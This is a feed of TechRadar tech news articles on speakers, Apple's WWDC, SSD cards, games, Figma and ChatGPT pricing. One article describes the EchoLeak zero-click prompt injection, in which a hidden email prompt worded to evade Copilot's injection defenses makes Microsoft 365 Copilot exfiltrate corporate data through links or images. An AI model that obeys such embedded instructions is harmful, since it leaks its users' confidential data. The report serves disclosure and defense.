Corporate PR nonsense first: The letters ES carry "layered meaning", because the E means "Elegant", the S stands for "Superb (or Luxurious)", and if you put those two letters together they stand for "Edifier Sound".

Nonsense aside, I love the look of the speakers: there are three models of increasing elongation, beginning with the super-cute square of the ES20, stretching into the rectangular ES60 and then the bigger box of the ES300. And the specs are impressive for all three.

It's not just speakers: there are new 92-hour ANC headphones too (Image credit: Edifier)Edifier ES20, ES60, and ES300: key features and pricing

The flagship here is the ES300, a 60W, handcrafted wooden speaker with leather-look accents, a braided grille and a metallic control panel. Behind the grille there's a 4-inch long-throw mid/bass driver and dual 1.25-inch silk dome tweeters.

The ES300 has hi-res audio up to 24-bit/96kHz, and it has dual-band WiFi and AirPlay 2. Wired ports are USB-A and Aux, and there's a built-in ambient light system with three effects and two colors.

The ES300 is $399.99 in the US, £299.99 in the UK* and AU$399 in Australia.

The portable ES60 is smaller but still punchy, with 34W of power through its dual 22mm tweeters, oval mid/bass driver with neodymium magnets and passive bass radiator. It has Bluetooth 5.4 with multipoint and stereo pairing, USB-C for audio input and charging, and promises 9 hours of playback. Like its bigger sibling it too has ambient lighting built-in.

The ES60 is $199.99 / £119.99 / AU$199.00.

Last but not least there's the teeny ES20, a 6W portable Bluetooth speaker with a 43mm full-range neodymium magnet driver and a 55mm passive bass radiator and a class D amp. It's IP67 rated, has Bluetooth 5.4 and includes a high sensitivity microphone for calling; once again there's built-in ambient lighting.

The ES20 is $89.99 / £49.99 / AU$99.

Edifier has also launched a set of headphones, the ES850NB. They're wireless over-ears with wired and wireless Hi-Res Audio certification, 40mm dynamic drivers and support for LDAC as well as the usual AAC and SBC. There's active noise cancellation, AI call clarity, and up to 92 hours of battery life.

The ES850NB headphones are $169.99 / £119.99 / AU$179.

All four models from the Edifier ES Series are available now.

* US prices are from Edifier's press release; UK and Australian prices are from retailers' websites.

You might also like
Categories: Technology

Live from WWDC 2025 – TechRadar podcast unpacks that massive iPadOS update and looks through Liquid Glass

Thu, 06/12/2025 - 13:54

It’s been a hectic week for Apple with an entirely new look dubbed Liquid Glass arriving for all its platforms, true multitasking on the iPad, some Apple Intelligence changes, a new naming scheme, and a workout buddy for the Apple Watch, among so much else. We’ve been breaking it all down at TechRadar, and you can find a nice roundup of the 15 things we learned at WWDC 2025 here.

But, in true TechRadar fashion, shortly after the nearly two-hour keynote, we sat down with two special guests in an ultra-sleek podcast studio inside the ring at Apple Park for a special edition of the TechRadar Podcast.

Tom’s Guide Managing Editor for Video and TikTok star Kate Kozuch, KLTA Tech Reporter and @RichOnTech radio host Rich DeMuro, and TechRadar’s Editor At Large Lance Ulanoff, joined me for a wide-ranging discussion on nearly everything that Apple announced.

(Image credit: Future)

If you’re curious about Liquid Glass – Apple’s new look for iOS, iPadOS, macOS, watchOS, and tvOS – you won’t have to wait long as we kick off our discussion there. We also quickly dive into the significant changes arriving with iPadOS 26, the super-charged Spotlight within macOS 26, and the shorter section of the keynote around Apple Intelligence and the update on Siri.

We even discuss what the significant changes on iPad – the arrival of multitasking, a dock, proper file support, and a menu bar – could mean for the future of the Mac. Does this mean a MacBook with a touchscreen is on the horizon, or is the iPad a true laptop replacement for anyone now?

And if you had thoughts about Apple’s updated naming schemes for its platforms – they’re all lined up to 26 now – we provide analysis on that and even some speculation on what this could mean for future hardware from Apple.

You can watch the video version of our special edition podcast below, or listen to the audio version on Apple Podcasts or Spotify. While you’re there, or on YouTube, why not follow us to stay up-to-date with everything happening in tech?

You might also like
Categories: Technology

Holidaymakers under threat from devious new cyber threat - here's how to stay safe

Thu, 06/12/2025 - 13:32
  • Experts warns of fake Booking.com sites circulating the web
  • The sites come with a fake "Accept Cookie" prompt that downloads a RAT
  • Shoppers should be on their guard when searching for deals

Hackers have been found targeting holidaymakers around the world with remote access trojans (RAT) distributed through fake Booking.com websites, experts have warned.

Researchers from HP Wolf Security found cybercriminals have been making websites that, on first glance, look just like booking.com - they carry the same branding, the same color scheme, and same formatting. However, the content of the website is blurred, and over it, a deceptive cookie banner is displayed.

If victims press “Accept cookies”, they’ll trigger a download of a malicious JavaScript file. This, in turn, installs XWorm, a powerful RAT that grants the attackers full control over the compromised device, including access to files, webcams, and microphone. They can also use the access to disable security tools, deploy additional malware, and exfiltrate passwords and other data.

Peak booking period

HP Wolf Security says it first spotted the campaign in Q1 2025, which is “peak summer holiday booking period”, and a time when “click fatigue” sets in, as prospective holidaymakers are reckless and don’t pay attention to the sites they’re visiting, ending in disaster.

"Since the introduction of privacy regulations such as GDPR, cookie prompts have become so normalized that most users have fallen into a habit of ‘click-first, think later,’” commented Patrick Schläpfer, Principal Threat Researcher in the HP Security Lab.

“By mimicking the look and feel of a booking site at a time when holiday-goers are rushing to make travel plans, attackers don’t need advanced techniques - just a well-timed prompt and the user’s instinct to click.”

There are a few things users can do to stay safe, and the first one is - to slow down when browsing.

Users should also make sure not to click on links in emails or social media messages, especially for well-established sites such as Booking. Instead, type in the address in the browser’s navigation bar manually.

You might also like
Categories: Technology

Microsoft makes fun of macOS Tahoe’s Liquid Glass redesign for ripping off Windows Vista – but Apple could have the last laugh

Thu, 06/12/2025 - 12:45
  • Microsoft compared Liquid Glass to Windows Vista on its Instagram account
  • It’s rather late to the party in drawing this kind of comparison
  • Mind you, if anyone has a right to do so, it’s Microsoft, which brought in transparency with the Aero effect on the desktop of Vista

Microsoft has joined the throng of those who’ve been making fun of Apple’s new Liquid Glass interface for macOS Tahoe 26 (and iOS 26 or indeed other platforms such as iPadOS 26).

On its Instagram account yesterday, as flagged up by Windows Latest, Microsoft posted a collection of screenshots of Windows Vista. This arrived complete with nostalgic sound effects (the chime of booting to the desktop) from back in the day (2007), with a single, simple sentence: “Just gonna leave this here.”

A post shared by Windows (@windows)

A photo posted by on

In case you missed it, Apple has caught quite a volley of criticism for what’s perceived as making it seem like Liquid Glass has reinvented the idea of transparency – a glassy, see-through interface – when this was actually done by Microsoft in… yes, you guessed it: Windows Vista.

In Windows Vista, this effect was called Aero (and later, Aero also came to Windows 7), and as you can see in the Instagram montage above, it’s all about translucent windows, allowing you to see the background through them.

Microsoft is late to the party here, really, and in that respect, the company looks a tad silly. Everybody’s done their take on how Liquid Glass is Vista (or Windows 7), how Apple are copycats, etcetera – and so Microsoft is running the risk of inducing some yawns here.

But still, Microsoft did invent Aero with these venerable desktop operating systems many translucent moons ago, so in a way, more than anyone, the software giant has a right to poke some fun at macOS Tahoe 26 here.

Analysis: Fun but not fair?

(Image credit: Apple)

So, given the hail of critical bullets trying to shatter Apple’s Liquid Glass – Microsoft’s latest potshot included – it’s worth considering a key question. Is it really fair to level accusations at the Mac and iDevice maker for being so unoriginal and dated with its UI innovation here?

I don’t think it is. Still, Apple must’ve known it was going to face this kind of backlash, even if it’s a rather tongue-in-cheek affair (mostly). And for Microsoft, it’s an obvious opportunity to take a rival down a peg or two, which, let’s face it, is not to be missed. However, I'm not sure why Microsoft was slow to move with its post.

Whatever the case, one thing is obvious: Liquid Glass does not equal Vista’s Aero effect (and I hardly think Microsoft is suggesting that, of course). Yes, there are clear visual parallels, but what macOS Tahoe 26 is doing is very different from Windows Vista or 7.

For starters, the reason nobody liked Aero much in Windows Vista was because it caused the OS environment to run slower – nobody wanted lag when dragging windows around the desktop, unsurprisingly. (Windows 7 did better here, of course).

Not only is contemporary hardware ripe for a much better implementation of transparent interface elements now, so it’ll all be suitably responsive, but Apple’s Liquid Glass appears to be far more sophisticated in nature. It looks like there’s a lot of careful crafting here, with nuances in the way light passes through the ‘glass’ and interacts with the interface behind.

Granted, it’s still too early to say exactly how this will pan out, but Aero it ain’t, that’s for sure. I’ve been told by others on the TechRadar team who’ve seen the interface in action that it looks much better in real-world use than screenshots can convey.

Even so, worries remain, without a doubt. The most obvious potential thorn is the diminished accessibility and the potential lack of clarity that these fancy, see-through effects might cause. What we don’t want is a muddied look where the user may struggle to read basic text or make out icons in the foreground.

Time will tell regarding those concerns, but Apple appears to have thought this whole plan and overarching philosophy through quite fully, given that this is not just a mere interface revamp, but a wholesale cross-platform unification for macOS, iOS, and all the rest of the company’s operating systems.

Thus far, Liquid Glass looks pretty slick, it looks like function is as important as form, and yes, it looks like Windows Vista a bit, too. But hey, what did you expect Apple to do with all eyes on its big WWDC 25 interface reveal? Acknowledge Microsoft as the forerunner of glassy transparency in the realm of desktop operating systems?

You might also like...
Categories: Technology

This GPU-like internal card combines 28 M.2 SSDs to offer up to 109GB/s read speed and 224TB storage - but I struggle to see any real use for it

Thu, 06/12/2025 - 12:32
  • Utran’s PCIe 5.0 card holds 28 M.2 SSDs, reaching a total 224TB capacity
  • Delivers 109GB/s read speed using Broadcom switch and advanced cooling
  • Ideal for AI workloads, but overkill for most enterprise storage needs

Utran Technology has introduced a new PCIe 5.0 add-in card which feels more like a GPU than a storage solution.

Unveiled at Computex 2025, the device can host up to 28 NVMe Gen5 M.2 8TB SSDs in a single slot, delivering 109GB/s sequential read speed and a total storage capacity of 224TB.

Two versions of the 28x M.2 Host Card: HM-5281A and HM-5282A will be available - both use the Broadcom AtlasII PEX89144 switch to handle internal bandwidth and connectivity. The HM-5281A uses a single PCIe Gen5 x16 upstream link, while the HM-5282A doubles that with two x16 links, bringing total bandwidth up to 1024 GT/s.

Surprise hot plug support

Cooling comes via a high-pressure fan and radiator combo. Although it has a dense footprint, the layout is built for rack-scale deployment. In theory, eight cards could deliver nearly 1.8PB of flash inside a single server.

Both models run on an EPS 8-pin connector and support surprise hot plug, meaning the system can detect and manage the 28 M.2 drives even if they’re swapped in unexpectedly. This is particularly useful for testing or dynamic environments. You'd need to take care doing so in real-world deployments though, especially as the card itself isn't hot-swappable.

28x M.2 Host Card also lacks card-level power loss protection, so you’d need to rely on SSDs that include their own safeguards.

The card does, however, support USB terminal control for firmware updates and system monitoring.

Supported operating systems include Windows, Windows Server, and Linux, making it relatively flexible at the software level.

It's hard to argue with the raw numbers - 109GB/s read speed and sub-millisecond latency are unquestionably impressive - but outside of certain HPC or AI use cases, it's frankly difficult to see a wide audience. Even in dense environments, this level of performance might outpace most storage needs.

Utran says it plans to begin shipping its 28x M.2 Host Card in summer 2025.

Via Tom's Hardware

You might also like
Categories: Technology

Metal Gear Solid Delta: Snake Eater will have several game modes, but I'm most excited about the newly announced Fox Hunt online multiplayer

Thu, 06/12/2025 - 11:20
  • Metal Gear Solid Delta: Snake Eater is getting an online multiplayer mode called Fox Hunt
  • Fox Hunt is a "completely original online battle mode"
  • Director Yu Sahara said the mode is set in the same world as the main game, but "gameplay is completely different"

Konami has announced that Metal Gear Solid Delta: Snake Eater will have an online multiplayer mode called Fox Hunt.

Revealed during the Konami Press Start livestream today, the publisher said that Fox Hunt is a "completely original online battle mode" that will play differently from 2008's Metal Gear Online.

Fox Hunt, which is being directed by series veteran Yu Sahara, takes place in the same world as the main game and will offer "hide and seek" mechanics, mixed with stealth and survival elements.

Sahara explained that although the multiplayer shares the same world with the main campaign, "the gameplay is completely different".

"When we say Metal Gear multiplayer, many fans will probably think of Metal Gear Online, but Fox Hunt will be its own new type of mode. We very much appreciate all the long-time fans of MGO who have always wanted to see it make a comeback, but the landscape of multiplayer games has changed a lot since MGO.

"It took a lot of careful consideration to think about what a new online mode should look like. Based on the iconic stealth and survival elements of the Metal Gear series, we are taking camouflage and hide and seek to the next level.

"We challenged ourselves to make something unique that is more than just a shootout. We’ve used that back-and-forth tension of staying hidden or searching out the enemy to create an online experience unique to Metal Gear."

Sahara confirmed that more information about Fox Hunt will be revealed soon.

Alongside Fox Hunt's reveal, Konami also shared a new gameplay trailer for the main game, the PC and PS5-exclusive Ape Escape mode, as well as the first look at the Bomb Snake battle. This Snake vs Bomberman mode is exclusive to Xbox Series X and Xbox Series S.

Secret Theatre is also returning, but this version will task players with locating Secret Theatre videos as collectibles, which are carried by soldiers.

Metal Gear Solid Delta: Snake Eater arrives on August 28 for PS5, Xbox Series X|S, and PC.

You might also like...
Categories: Technology

This iPhone Bluetooth audio issue frustrates me every day, but iOS 26 is finally going to fix it

Thu, 06/12/2025 - 11:18
  • The first iOS 26 developer is out now ahead of its public beta launch in July
  • One of its upgrades is a new option called 'Keep Audio in Headphones'
  • This should reduce auto-switching problems for wireless headphones

If you're tired of your iPhone automatically switching to every other Bluetooth device other than your headphones, then iOS 26 has a treat for you – a new option to make the audio stay connected to your wireless headphones.

As spotted by MacRumors, the new iOS 26 developer beta has a long-awaited new option called "Keep Audio in Headphones" in the iPhone's Settings. The new option will seemingly live in the Settings > General > AirPlay & Continuity section and is specifically designed to stop headphones from making unwanted connections to nearby devices.

Apple's description of the feature says "when using AirPods or other connected headphones, keep audio in your headphones when other playback devices like cars and speakers connect to iPhone."

This happens to me all the time, whether it's my audio automatically switching to in-car speakers or to my iPad when it's being used by someone else. Clearly, I'm not alone in finding this annoyance frustrating, so Apple's thankfully including this new option in iOS 26, and it'll hopefully make it to the software's final release in September.

A bit old in the Bluetooth

There are currently workarounds (like the option above) for controlling AirPods auto-switching, but this new iOS 26 one should work across a broad range of Bluetooth devices. (Image credit: Apple / Future)

Bluetooth is now over 25 years old, so in some ways it's miraculous that the short-range wireless tech works as well as it does – yet it's also frequently frustrating.

Without the option of prioritizing the order of your preferred Bluetooth devices, it can often feel like auto-switching has a mind of its own. So, this setting, while not exactly one of the biggest iOS 26 features, it's definitely a welcome quality-of-life tweak.

Not that it's the only frustrating Bluetooth-related issue we have to grapple with. As our colleagues at What Hi Fi? recently noted, it's high time audio manufacturers started standardizing their Bluetooth pairing processes, too.

Of course, these are very much first-world problems, but at least Bluetooth 6.0 is now rolling out to bring more refinements to the now-ancient tech. These include improved filtering and efficiency, which should bring battery life benefits, along with a feature called Channel Sounding to help improve the accuracy of 'find my device' services from the likes of Apple, Google and Samsung.

You might also like
Categories: Technology

Microsoft Copilot targeted in first “zero-click” attack on an AI agent - what you need to know

Thu, 06/12/2025 - 11:06
  • Security researchers Aim Labs discovered an LLM Scope Violation flaw in Microsoft 365 Copilot
  • The critical-severity bug allows threat actors to exfiltrate sensitive corporate data by sending an email
  • Microsoft says it has fixed the issue server-side, but users should be on guard

Microsoft has fixed a dangerous zero-click attack in its Generative Artificial Intelligence (GenAI) model which could have allowed threat actors to silently exfiltrate sensitive corporate data without (almost) any user interaction.

Cybersecurity researchers Aim Labs, who found the flaw, known as an “LLM Scope Violation”, and dubbed it EchoLeak.

Here is how it works: A threat actor sends a seemingly innocuous email message to the target, which contains a hidden prompt that instructs Copilot to exfiltrate sensitive data to an attacker-controlled server. Since Copilot is integrated into Microsoft 365, that data can include anything from intellectual property files, to business contracts and legal documents, or from internal communications, to financial data.

Critical vulnerability

The researchers note the prompt needs to be phrased like speaking to a human, so that it bypasses Microsoft’s XPIA (cross-prompt injection attack) defenses.

Later, when the victim interacts with Copilot and asks a business-related question, the LLM will pull all of the relevant data (including the attackers’ email message) and will end up executing it. The files are stored in a crafted link or an image.

The bug was assigned the CVE-2025-32711 identifier, and was given a severity score of 9.3/10 (critical). It was fixed server-side in May, meaning users don’t need to do anything. Microsoft also said that there is no evidence that the flaw had been exploited in the past, and none of its customers were impacted.

Microsoft 365 is one of the most popular cloud-based communications and online collaboration tools, combining office apps (Word, Excel, and others), cloud storage (OneDrive and SharePoint), email and calendar (Outlook, Exchange), and communications tools (Teams).

Recently, Microsoft integrated its Generative AI model, Copilot, into Microsoft 365, allowing users to draft and summarize emails, generate and edit documents, create data visualizations and analyze trends, and more.

Via BleepingComputer

You might also like
Categories: Technology

Figma unveils big new updates for design and dev - but I'm mostly excited about the rollout of this one tool

Thu, 06/12/2025 - 11:05
  • Figma unveils new AI tools for developers and designers
  • Figma Make finally rolls out to all users with Full Seat
  • Code layers comes to Figma Sites

Over the past week, Figma has made good on its many promises revealed at its Config 2025 event.

After announcing the release of four new products - Figma Make, Figma Sites, Figma Buzz, and Figma Draw - the company has now launched a few new updates for developers and designers, alongside the full rollout of its big content ideation tool Figma Make.

According to Figma, these updates are all about “bridging the gap between design and code” with the help of new AI tools. So, what can users expect now?

What’s new in Figma?

For me, the most exciting new release is Figma Make. Finally out of beta, it’s available now to those with a Full Seat.

Figma Make is effectively an overarching design tool that spans the entire platform, and a massive leap for content ideation, where users can start with a blank canvas or copy and paste from Figma Designs, collaborate on new ideas, and then bring those designs over to other Figma tools like Sites to refine the concepts.

According to the company, Figma Make is fully capable of helping users create “an agentic AI interface, a business newsletter, and even games.”

When I attended a press briefing at Config London, I was struck by how Yuhki Yamashita, Figma’s Chief Product Officer, repeatedly mentioned how the premise here is being able to quickly conjure up ideas, throw them out if they don’t work, then start anew.

At the time, he said, “Our thought experiment was, how can we make it so easy for you to go from the idea into your head to something that is actually you can put in front of users and validate really quickly. And if it doesn't work, that's great. You can then move on to the next idea, or you can keep iterating from there.”

But it’s not the only big rollout users can now try. Figma has also released a new Dev Mode MCP Server, which is currently in beta.

Eagle-eyed Figma-watchers will have clocked an early demo of this during Microsoft Build’s opening keynote.

The company describes the MCP Server as a way to deliver design context from Figma - think variables and styles, that sort of thing - into their preferred LLM, IDE, or agentic coding tool, making sure that AI-generated code aligns with the users’ codebase.

And finally, code layers are now rolling out across Figma Sites, the AI-powered website builder. Here, users with pretty much any technical ability can customize websites and build site interactions and animations using AI prompts, presets, or raw code.

I was pretty impressed when I saw Figma Sites in action at Config, where AI prompts were used to transform static text into animated text that reacted to cursor movements. It’s designed in such a way that even a non-designer can easily edit content.

At Config, Yamashita promised bigger things were afoot, saying, “we wanted to make sure that we could support scaled use cases, too. With these kinds of content, it's much easier if we have a CMS, so that a non-designer can come in and comfortably edit that content in a way that's familiar to them. And this is something that's coming soon.” Looks like it’s finally arrived.

You can check out the newest tools from Figma by clicking here and navigating to the Products section.

You might also like
Categories: Technology

Got ChatGPT Plus? You can now get 3 months for 50% off with this simple trick

Thu, 06/12/2025 - 11:00
  • Get ChatGPT Plus for 3 months at a discounted 50% off rate
  • This easy trick is accessible via ChatGPT's official website
  • ChatGPT Plus gives you access to OpenAI's best models and all the latest features such as Sora

ChatGPT is free to use, but if you want access to OpenAI's latest AI models and tools like the video generation platform Sora, you'll need a ChatGPT Plus account.

Normally, ChatGPT Plus costs $20 (£20 / AU$30 a month), but one Reddit user (u/PrettyRevolution1842) has shared an excellent and easy trick to get 3 months of the service for half price.

With this quick trick, you'll get ChatGPT Plus for $10 (£10 / AU$15 a month) for 3 months, although in order to be able to get this discounted rate, you'll need to be subscribed already to ChatGPT Plus.

That said, even if you subscribe to ChatGPT Plus at the full price rate for 1 month before following the steps below, you'd still be getting four months of Plus for $50 (£50 / AU$75) instead of $80 (£80 / AU$120).

How to get 3 months of ChatGPT Plus for half price
  1. On desktop, go to ChatGPT Settings
  2. Click Manage My Subscriptions
  3. Select Cancel Plan
  4. Accept the 50% off for the next 3 months offer

It's as easy as that, you'll now have a discounted rate of ChatGPT Plus for the next three months. Just remember to cancel auto-renewal so you aren't caught with some hefty fees after the promotional period ends.

ChatGPT Plus offers extended limits on messaging, access to OpenAI's best research and reasoning models like OpenAI o3, OpenAI o4-mini, and OpenAI o4-mini-high, access to new features before free users, and more.

If you're still unsure, read our guide: Is ChatGPT Plus actually worth it?

You might also like
Categories: Technology

Pages